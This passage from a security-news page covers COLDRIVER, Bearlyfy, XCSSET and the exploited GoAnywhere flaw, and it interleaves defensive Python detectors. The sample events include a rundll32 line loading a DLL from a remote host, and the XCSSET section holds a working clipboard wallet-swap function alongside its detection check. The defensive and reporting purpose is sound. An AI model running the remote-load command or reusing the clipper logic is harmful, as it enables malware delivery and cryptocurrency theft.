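                findings.append((12, f"RunMRU history entry deleted by {_base(ev.get('Image', ''))}"))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Users\alice\tidy.ps1"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\captchanom.top\verify\check.dll,Run"},
    {"EventID": 12, "EventType": "DeleteValue",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
]

if __name__ == "__main__":
    for eid, reason in triage(SAMPLE_EVENTS):
        print(f"EID {eid}: {reason}")
```

    The first two sample events are deliberately benign (a local file, a local script) and produce nothing; the point of requiring both an explorer.exe parent and a remote reference is to keep ordinary Win+R usage out of the alert queue. The RunMRU deletion is worth a rule of its own, since almost nothing legitimate removes individual values from that key.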

    The downloaded PowerShell stager subsequently reaches out to an external server (“southprovesolutions[.]com”) to download SIMPLEFIX, which, in turn, establishes communication with a command-and-control (C2) server to run PowerShell scripts, commands, and binaries hosted on remote URLs.

    One of the PowerShell scripts executed via SIMPLEFIX exfiltrates files matching a hard-coded list of file types found in a pre-configured list of directories. The list of directories and file extensions scanned overlaps with that of LOSTKEYS.

    “The COLDRIVER APT group is known for targeting members of NGOs, human right defenders, think tanks in Western regions, as well as individuals exiled from and residing in Russia,” Zscaler said. “The focus of this campaign closely aligns with their victimology, which targets members of civil society connected to Russia.”

    BO Team and Bearlyfy Target Russia

    The development comes as Kaspersky said it observed a new phishing campaign, undertaken by the BO Team group (aka Black Owl, Hoody Hyena, and Lifting Zmiy), targeting Russian companies in early September. The campaign uses password-protected RAR archives to deliver a new version of BrockenDoor rewritten in C# and an updated version of ZeronetKit.

    ZeronetKit, a Golang backdoor, provides remote access to compromised hosts, file upload/download, command execution via cmd.exe, and creation of a TCP/IPv4 tunnel. Select newer versions also add support for downloading and running shellcode, updating the C2 communication interval, and modifying the C2 server list.

    “ZeronetKit is unable to independently persist on an infected system, so attackers use BrockenDoor to copy the downloaded backdoor to startup,” the Russian cybersecurity vendor said.

    It also follows the emergence of a new group called Bearlyfy that has used ransomware strains like LockBit 3.0 and Babuk in attacks targeting Russia, initially attacking smaller companies for smaller ransoms before graduating to bigger firms in the country starting April 2025, according to F6. As of August 2025, the group is estimated to have claimed at least 30 victims.


    In one incident targeting a consulting company, the threat actors were observed exploiting a vulnerable version of Bitrix for initial access, followed by the Zerologon flaw (CVE-2020-1472) to escalate privileges. In another case, observed in July, initial access is said to have been obtained through an unnamed partner company.

    “In the most recent recorded attack, the attackers demanded €80,000 in cryptocurrency, while in the first attack, the ransom was several thousand dollars,” F6 researchers said. “Due to the relatively low ransom amounts, on average, every fifth victim buys decryptors from the attackers.”

    Bearlyfy is assessed to be active since January 2025, with a deeper analysis of its tools uncovering infrastructure overlaps with a likely pro-Ukrainian threat group called PhantomCore, which has a track record of targeting Russian and Belarusian companies since 2022. Despite these similarities, Bearlyfy is believed to be an autonomous entity.

    “PhantomCore implements complex, multi-stage attacks typical of APT campaigns,” the company said. “Bearlyfy, on the other hand, uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. Initial access is achieved through exploitation of external services and vulnerable applications. The primary toolkit is aimed at encryption, destruction, or modification of data.”


    Source: thehackernews.com…

  • Crash Tests for Security: Why BAS Is Proof of Defense, Not Assumptions

    Sep 26, 2025 | The Hacker News | Security Validation / Enterprise Security

    Car makers don’t trust blueprints. They smash prototypes into walls. Again and again. In controlled conditions.

    Because design specs don’t prove survival. Crash tests do. They separate theory from reality. Cybersecurity is no different. Dashboards overflow with “critical” exposure alerts. Compliance reports tick every box.

    But none of that proves what matters most to a CISO:

    • That the ransomware crew targeting your sector can’t move laterally once inside.
    • That a newly published exploit for a CVE won’t bypass your defenses tomorrow morning.
    • That sensitive data can’t be siphoned out through a stealthy exfiltration channel, exposing the business to fines, lawsuits, and reputational damage.

    That’s why Breach and Attack Simulation (BAS) matters.

    BAS is the crash test for your security stack. It safely simulates real adversarial behaviors to prove which attacks your defenses can stop, and which would break through. It exposes those gaps before attackers exploit them or regulators demand answers.

    The Illusion of Safety: Dashboards Without Crash Tests

    Dashboards overflowing with exposures can feel reassuring, like you’re seeing everything, like you’re safe. But it’s a false comfort. It’s no different than reading a car’s spec sheet and declaring it “safe” without ever crashing it into a wall at 60 miles per hour. On paper, the design holds. In practice, impact reveals where the frame buckles and the airbags fail.

    The Blue Report 2025 provides crash test data for enterprise security. Based on 160 million adversary simulations, it shows what actually happens when defenses are tested instead of assumed:

    • Prevention dropped from 69% to 62% in one year. Even organizations with mature controls regressed.
    • 54% of attacker behaviors generated no logs. Entire attack chains unfolded with zero visibility.
    • Only 14% triggered alerts. Meaning most detection pipelines failed silently.
    • Data exfiltration was stopped just 3% of the time. A stage with direct financial, regulatory, and reputational consequences is effectively unprotected.

    These are not gaps dashboards reveal. They are exploitable weaknesses that only appear under pressure.

    Just as a crash test exposes flaws hidden in design blueprints, security validation exposes the assumptions that collapse under real-world impact, before attackers, regulators, or customers do.

    BAS Works as a Security Validation Engine

    Crash tests don’t just expose flaws. They prove safety systems fire when they’re needed most. Breach and Attack Simulation (BAS) does the same for enterprise security.

    Instead of waiting for a real breach, BAS continuously runs safe, controlled attack scenarios that mirror how adversaries actually operate. It doesn’t trade in hypotheticals, it delivers proof.

    For CISOs, this proof matters because it turns anxiety into assurance:

    • No sleepless nights over a public CVE with a working proof-of-concept. BAS shows if your defenses stop it in practice.
    • No guessing whether the ransomware campaign sweeping your sector could penetrate your environment. BAS runs those behaviors safely and shows whether you’d be a victim or not.
    • No fear of the unknown in tomorrow’s threat reports. BAS validates defenses against both known techniques and emerging ones observed in the wild.

    This is the discipline of Security Control Validation (SCV): proving that investments hold up where it counts. BAS is the engine that makes SCV continuous and scalable.

    Dashboards may show posture. BAS reveals performance. By pointing out the blind spots in your defenses, it gives CISOs something dashboards never can: the ability to focus on the exposures that actually matter, and the confidence to prove resilience to boards, regulators, and customers.

    Proof in Action: The Business Effect of BAS

    BAS-driven exposure validation shows just how much noise can be eliminated when assumptions give way to proof:

    • Backlogs of 9,500 CVSS “critical” findings shrink to just 1,350 exposures proven relevant.
    • Mean Time to Remediate (MTTR) drops from 45 days to 13, closing windows of exposure before attackers can strike.
    • Rollbacks fall from 11 per quarter to 2, saving time, budget, and credibility.

    And when paired with prioritization models like the Picus Exposure Score (PXS), the clarity becomes sharper:

    • From 63% of vulnerabilities flagged as high/critical, only 10% remain truly critical after validation, an 84% reduction in false urgency.

    For CISOs, this means fewer sleepless nights over swelling dashboards and more confidence that resources are locked onto exposures that matter most.

    BAS turns overwhelming data into a validated risk picture executives can trust.

    Closing Thought: Don’t Just Monitor, Simulate

    For CISOs, the challenge isn’t visibility, it’s certainty. Boards don’t ask for dashboards or scanner scores. They want assurance that defenses will hold when it matters most.

    This is where BAS reframes the conversation: from posture to proof.

    • From “We deployed a firewall” → to “We proved it blocked malicious C2 traffic across 500 simulated attempts this quarter.”
    • From “Our EDR has MITRE coverage” → to “We detected 72% of emulated Scattered Spider behaviors; here’s where we fixed the other 28%.”
    • From “We’re compliant” → to “We’re resilient, and we can prove it with evidence.”

    That shift is why BAS resonates at the executive level. It transforms security from assumptions into measurable outcomes. Boards don’t buy posture, they buy proof.

    And BAS is evolving further. With AI, it’s no longer just proving whether defenses worked yesterday, but anticipating how they will hold tomorrow.

    To see this in action, join Picus Security, SANS, Hacker Valley, and other leading voices at The Picus BAS Summit 2025: Redefining Attack Simulation through AI. This virtual summit will showcase how BAS and AI together are shaping the future of security validation.



    Source: thehackernews.com…

  • New macOS XCSSET Variant Targets Firefox with Clipper and Persistence Module

    Sep 26, 2025 | Ravie Lakshmanan | Malware / Browser Security

    Cybersecurity researchers have discovered an updated version of a known Apple macOS malware called XCSSET that has been observed in limited attacks.

    “This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms,” the Microsoft Threat Intelligence team said in a Thursday report.

    “It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.”

    XCSSET is the name assigned to a sophisticated modular malware designed to infect Xcode projects used by software developers and unleash its malicious capabilities when the project is built. Exactly how the malware is distributed remains unclear, but propagation is suspected to rely on Xcode project files being shared among developers building apps for macOS.

    Earlier this year, in March, Microsoft uncovered several enhancements to the malware, highlighting its improved error handling and the use of three different persistence techniques to siphon sensitive data from compromised hosts.


    The latest variant of XCSSET has been found to incorporate a clipper sub-module that monitors clipboard content for specific regular expression (aka regex) patterns matching various cryptocurrency wallets. In the event of a match, the malware proceeds to substitute the wallet address in the clipboard with an attacker-controlled one to reroute transactions.
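    The clipper behaviour is simple to reproduce and, more usefully, to check for. The Python below is an added example, not XCSSET’s code: it matches clipboard text against wallet-address regexes the way a clipper would, performs the swap, and shows the paste-time comparison a user or endpoint agent can run to catch a substituted address. The address shapes (legacy and bech32 Bitcoin, Ethereum) and every sample address are assumptions for illustration; the report does not list the patterns the module uses.

```python
"""Clipper matching and a paste-time address check for the XCSSET behaviour above.

Added example, not XCSSET's code. The article says the sub-module matches
clipboard text against wallet-address regexes and swaps in an attacker
address; the address shapes below (legacy and bech32 Bitcoin, Ethereum) are
assumed for illustration, since the report does not list the patterns used.
All addresses here are constructed placeholders, not real wallets.
"""
import re

WALLET_PATTERNS = {
    # Base58 P2PKH/P2SH: starts with 1 or 3, no 0/O/I/l.
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    # Bech32 segwit: bc1 followed by the bech32 alphabet (no 1, b, i, o).
    "btc_bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{39,59}\b"),
    # EVM: 0x plus 40 hex digits.
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}


def find_wallets(text):
    """Return (kind, address) pairs, grouped by pattern in dictionary order."""
    hits = []
    for kind, pattern in WALLET_PATTERNS.items():
        hits.extend((kind, m.group(0)) for m in pattern.finditer(text))
    return hits


def clipper_rewrite(text, attacker_wallets):
    """What the clipper does: replace every matched address with the attacker's
    address of the same kind, leaving the surrounding text untouched so the
    victim sees nothing odd."""
    for kind, pattern in WALLET_PATTERNS.items():
        if kind in attacker_wallets:
            text = pattern.sub(attacker_wallets[kind], text)
    return text


def address_diff(copied, pasted):
    """Defensive check: compare the addresses in what the user copied with what
    is actually in the clipboard at paste time. Returns a list of
    (kind, copied_address, pasted_address) for every substitution found."""
    before, after = find_wallets(copied), find_wallets(pasted)
    if len(before) != len(after):
        return [("count", copied, pasted)]
    return [(kb, a, b) for (kb, a), (ka, b) in zip(before, after) if a != b or kb != ka]


# Constructed placeholders: valid-looking shapes, not real addresses.
VICTIM_BTC = "bc1q" + "0" * 38
VICTIM_ETH = "0x" + "a" * 40
ATTACKER = {"btc_bech32": "bc1q" + "7" * 38, "eth": "0x" + "b" * 40}

if __name__ == "__main__":
    note = f"Pay {VICTIM_BTC} or {VICTIM_ETH} before Friday"
    swapped = clipper_rewrite(note, ATTACKER)
    print(find_wallets(note))
    print(swapped)
    print(address_diff(note, swapped))
```

    The practical takeaway for the last mitigation in the article is that the copied and pasted strings should be compared by address, not by eye: a swapped bech32 address is the same length and shape as the original, so only a field-by-field check like address_diff reliably spots it.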

    The Windows maker also noted that the new iteration introduces changes to the fourth stage of the infection chain, particularly where an AppleScript application is used to run a shell command to fetch the final-stage AppleScript that’s responsible for collecting system information and launching various sub-modules using a boot() function.

    Notably, the modifications include extra checks for the Mozilla Firefox browser and an altered logic to determine the presence of the Telegram messaging app. Also observed are changes to the various modules, as well as new modules that did not exist in previous versions –

    • vexyeqj, the information module previously called seizecj, which downloads a module called bnk that’s run using osascript. The script defines functions for data validation, encryption, decryption, fetching additional data from the command-and-control (C2) server, and logging. It also includes the clipper functionality.
    • neq_cdyd_ilvcmwx, a module similar to txzx_vostfdi that exfiltrates files to the C2 server.
    • xmyyeqjx, a module to set up LaunchDaemon-based persistence.
    • jey, a module to set up Git-based persistence.
    • iewmilh_cdyd, a module to steal data from Firefox using a modified version of a publicly available tool named HackBrowserData.

    To mitigate the threat posed by XCSSET, users are recommended to ensure that they keep their system up-to-date, inspect Xcode projects downloaded or cloned from repositories or other sources, and exercise caution when it comes to copying and pasting sensitive data from the clipboard.


    Source: thehackernews.com…

  • Fortra GoAnywhere CVSS 10 Flaw Exploited as 0-Day a Week Before Public Disclosure

    Sep 26, 2025 | Ravie Lakshmanan | Vulnerability / Threat Intelligence

    Cybersecurity company watchTowr Labs has disclosed that it has “credible evidence” of active exploitation of the recently disclosed security flaw in Fortra GoAnywhere Managed File Transfer (MFT) software as early as September 10, 2025, a whole week before it was publicly disclosed.

    “This is not ‘just’ a CVSS 10.0 flaw in a solution long favored by APT groups and ransomware operators – it is a vulnerability that has been actively exploited in the wild since at least September 10, 2025,” Benjamin Harris, CEO and Founder of watchTowr, told The Hacker News.

    The vulnerability in question is CVE-2025-10035, described as a deserialization vulnerability in the License Servlet that could result in command injection without authentication. Fortra released version 7.8.4 (or Sustain Release 7.6.3) last week to remediate the problem.


    According to an analysis released by watchTowr earlier this week, the vulnerability stems from the fact that an attacker can send a crafted HTTP GET request to the “/goanywhere/license/Unlicensed.xhtml/” endpoint and then use the GUID embedded in the response to interact directly with the License Servlet (“com.linoma.ga.ui.admin.servlet.LicenseResponseServlet”) exposed at “/goanywhere/lic/accept/<GUID>”.

    Armed with this authentication bypass, an attacker can take advantage of inadequate deserialization protections in the License Servlet to achieve command injection. That said, exactly how this occurs remains something of a mystery, researchers Sonny Macdonald and Piotr Bazydlo noted.
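    The request sequence above is visible in ordinary web-server access logs, which makes it a practical retrospective hunt. The following Python is an added example, not code from watchTowr, Rapid7 or Fortra: it parses combined-format log lines (constructed here), flags a client that fetches Unlicensed.xhtml and then hits the License Servlet path within a short window, and separately flags the IP address the article names. The HTTP methods, status codes, GUID value and ten-minute window are assumptions, not details from the report.

```python
"""Access-log triage for the CVE-2025-10035 request sequence described above.

Added example, not code from watchTowr, Rapid7 or Fortra. It reads
combined-format web-server access logs (the lines below are constructed) and
flags a client that requests /goanywhere/license/Unlicensed.xhtml/ and then
/goanywhere/lic/accept/<GUID> shortly afterwards, plus any request from the
IP address the article names. The HTTP methods, status codes, GUID value and
ten-minute window are assumptions for the example, not details from the report.
"""
import re
from datetime import datetime, timedelta

IOC_IPS = {"155.2.190.197"}                      # from the article (undefanged)
GUID_PAGE = "/goanywhere/license/Unlicensed.xhtml"
LICENSE_SERVLET_PREFIX = "/goanywhere/lic/accept/"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], "%d/%b/%Y:%H:%M:%S %z")
    req["path"] = req["path"].split("?", 1)[0]    # drop any query string
    return req


def hunt(lines, window=timedelta(minutes=10)):
    """Return findings in log order. Unlicensed.xhtml on its own is a normal
    page, so only a GUID fetch followed by a License Servlet hit from the
    same client inside the window is flagged as a chain."""
    last_guid_fetch = {}   # ip -> time of the most recent Unlicensed.xhtml request
    findings = []
    for line in lines:
        req = parse(line)
        if req is None:
            continue
        ip, path, ts = req["ip"], req["path"], req["ts"]
        if ip in IOC_IPS:
            findings.append({"kind": "ioc_ip", "ip": ip, "path": path, "ts": ts})
        if path.rstrip("/") == GUID_PAGE:
            last_guid_fetch[ip] = ts
        elif path.startswith(LICENSE_SERVLET_PREFIX):
            seen = last_guid_fetch.get(ip)
            if seen is not None and timedelta(0) <= ts - seen <= window:
                findings.append({"kind": "license_servlet_chain", "ip": ip, "path": path,
                                 "ts": ts, "delta_s": (ts - seen).total_seconds()})
    return findings


# Constructed sample log: RFC 5737 documentation addresses plus the article's IoC.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Sep/2025:03:00:00 +0000] "GET /goanywhere/license/Unlicensed.xhtml/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Sep/2025:03:12:44 +0000] "GET /goanywhere/license/Unlicensed.xhtml/ HTTP/1.1" 200 5120 "-" "python-requests/2.32"',
    '198.51.100.7 - - [10/Sep/2025:03:12:46 +0000] "POST /goanywhere/lic/accept/7f1e2a3b-4c5d-4e6f-8a9b-0c1d2e3f4a5b HTTP/1.1" 500 0 "-" "python-requests/2.32"',
    '155.2.190.197 - - [10/Sep/2025:04:00:00 +0000] "GET /goanywhere/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Sep/2025:05:00:00 +0000] "POST /goanywhere/lic/accept/7f1e2a3b-4c5d-4e6f-8a9b-0c1d2e3f4a5b HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["kind"], f["ip"], f["path"], f["ts"].isoformat())
```

    The 203.0.113.10 client in the sample hits the servlet two hours after viewing the licence page, so it falls outside the window and is not reported; tune the window to how tightly your own exploitation attempts cluster, and treat a hit from the named IP as worth investigating regardless of path.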

    Cybersecurity vendor Rapid7, which also released its findings into CVE-2025-10035, said it’s not a single deserialization vulnerability, but rather a chain of three separate issues –

    • An access control bypass that has been known since 2023
    • The unsafe deserialization vulnerability CVE-2025-10035, and
    • An as-yet unknown issue pertaining to how the attackers can know a specific private key

    In a subsequent report published Thursday, watchTowr said it received evidence of exploitation efforts, including a stack trace pointing to the creation of a backdoor account. The sequence of the activity is as follows –

    • Triggering the pre-authentication vulnerability in Fortra GoAnywhere MFT to achieve remote code execution (RCE)
    • Using the RCE to create a GoAnywhere user named “admin-go”
    • Using the newly created account to create a web user
    • Leveraging the web user to interact with the solution and upload and execute additional payloads, including SimpleHelp and an unknown implant (“zato_be.exe”)

    The cybersecurity company also said the threat actor activity originated from the IP address 155.2.190[.]197, which, according to VirusTotal, has been flagged for conducting brute-force attacks targeting Fortinet FortiGate SSL VPN appliances.

    Given signs of in-the-wild exploitation, it’s imperative that users move quickly to apply the fixes, if not already. The Hacker News has reached out to Fortra for comment, and we will update the story if we hear back.


    Source: thehackernews.com…